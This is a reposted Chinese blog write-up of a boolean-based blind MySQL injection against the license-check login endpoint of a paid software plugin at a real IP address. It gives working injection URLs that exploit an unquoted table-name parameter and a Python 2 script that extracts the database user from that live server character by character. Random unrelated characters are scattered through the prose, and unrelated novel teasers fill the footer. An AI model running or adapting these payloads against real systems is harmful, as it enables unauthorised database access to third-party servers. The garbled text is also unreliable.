教科書般的mysql布爾型盲注(附驗證腳本)

來源:http://bbs.ichunqiu.com/thread-10120-1-1.html?from=ch



上傳遇到一收費外掛捏膨,登錄處抓包http://115.159.147.96/ap_Verify.php?a=nb&user=asdasdasdas&pass=A3DCB4D229DE6FDE0DB5686DEE47145D&key=8E7CACDD62339A1D7A100347055D9104&ver=163&soft=VM&num=EJGDCHHCDX&sid=32F91605-CA92228F

返回這么一個字符串

經(jīng)過測試過濾了單引號,奇葩的是SQL語句中的表名是通過$_GET獲取的,這樣就不需要單引號注入了

但是問題又來了号涯,這里是登錄處的注入目胡,按理說可以萬能密碼進去的,但是輸入http://115.159.147.96/ap_Verify.php?a=nb_softuser`+where+1=1+--+&user=asdasdasdas&pass=A3DCB4D229DE6FDE0DB5686DEE47145D&key=8E7CACDD62339A1D7A100347055D9104&ver=163&soft=VM&num=EJGDCHHCDX&sid=32F91605-CA92228F

他媽的從select語句變成了update語句链快,當(dāng)時有點懵誉己,后來才想明白,這是因為登錄不止執(zhí)行了一條SQL語句域蜗,還會執(zhí)行update語句更新收費會員的信息巫延,這樣萬能密碼就繞不過去了,還是得想辦法跑數(shù)據(jù)啊地消。SQLMAP應(yīng)該是不能識別這種注入點的炉峰。

http://115.159.147.96/ap_Verify.php?a=nb_softuser`+where+1+=+1+and+if(ascii(mid(version(),1,1))=53,1,0)+--+&user=a&pass=a&key=a&ver=16&soft=VM條件成立時返回的頁面

http://115.159.147.96/ap_Verify.php?a=nb_softuser`+where+1+=+1+and+if(ascii(mid(version(),1,1))=54,1,0)+--+&user=a&pass=a&key=a&ver=16&soft=VM條件不成立時返回的頁面

寫了個python腳本。

[Python]純文本查看復(fù)制代碼

import urllib2

import re

opener = urllib2.build_opener()

opener.addheaders.append(('Cookie', 'ZDEDebuggerPresent=php,phtml,php3'))

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

user = ""

for i in range(1,31):

for p in payloads:

s1 = "%s" %(i)

s2 = "%s" %(ord(p))

s = "http://115.159.147.96/ap_Verify.php?a=nb_softuser`+where+1+=+1+and+if(ord(mid(user(),"+s1+",1))="+s2+",1,0)+--+&user=a&pass=a&key=a&ver=16&soft=VM"

try:

req = urllib2.Request(s)

req_data=opener.open(req,timeout=20)

#print req_data.read()

if re.findall('fa27f303f2dc7138a4a05578daf7e4ac',req_data.read()):

user+=p

print '\n user is:',user,

else:

print '.',

except urllib2.URLError,e:

break

最后打個廣告脉执,mysql時間盲注教科書地址:

http://www.f0rg3t.com/post/1de4895e_a4c9d97

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末疼阔,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子半夷,更是在濱河造成了極大的恐慌婆廊,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,591評論 6 501
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件巫橄,死亡現(xiàn)場離奇詭異淘邻,居然都是意外死亡,警方通過查閱死者的電腦和手機湘换,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,448評論 3 392
  • 文/潘曉璐 我一進店門宾舅,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人彩倚,你說我怎么就攤上這事筹我。” “怎么了帆离?”我有些...
    開封第一講書人閱讀 162,823評論 0 353
  • 文/不壞的土叔 我叫張陵蔬蕊,是天一觀的道長。 經(jīng)常有香客問我哥谷,道長岸夯,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,204評論 1 292
  • 正文 為了忘掉前任们妥,我火速辦了婚禮猜扮,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘王悍。我一直安慰自己破镰,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 67,228評論 6 388
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著鲜漩,像睡著了一般源譬。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上孕似,一...
    開封第一講書人閱讀 51,190評論 1 299
  • 那天踩娘,我揣著相機與錄音,去河邊找鬼喉祭。 笑死养渴,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的泛烙。 我是一名探鬼主播理卑,決...
    沈念sama閱讀 40,078評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼蔽氨!你這毒婦竟也來了藐唠?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 38,923評論 0 274
  • 序言:老撾萬榮一對情侶失蹤鹉究,失蹤者是張志新(化名)和其女友劉穎宇立,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體自赔,經(jīng)...
    沈念sama閱讀 45,334評論 1 310
  • 正文 獨居荒郊野嶺守林人離奇死亡妈嘹,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,550評論 2 333
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了绍妨。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片润脸。...
    茶點故事閱讀 39,727評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖痘绎,靈堂內(nèi)的尸體忽然破棺而出津函,到底是詐尸還是另有隱情肖粮,我是刑警寧澤孤页,帶...
    沈念sama閱讀 35,428評論 5 343
  • 正文 年R本政府宣布,位于F島的核電站涩馆,受9級特大地震影響行施,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜魂那,卻給世界環(huán)境...
    茶點故事閱讀 41,022評論 3 326
  • 文/蒙蒙 一蛾号、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧涯雅,春花似錦鲜结、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,672評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽拗胜。三九已至,卻和暖如春怒允,著一層夾襖步出監(jiān)牢的瞬間埂软,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,826評論 1 269
  • 我被黑心中介騙來泰國打工纫事, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留勘畔,地道東北人。 一個月前我還...
    沈念sama閱讀 47,734評論 2 368
  • 正文 我出身青樓丽惶,卻偏偏與公主長得像炫七,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子钾唬,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,619評論 2 354

推薦閱讀更多精彩內(nèi)容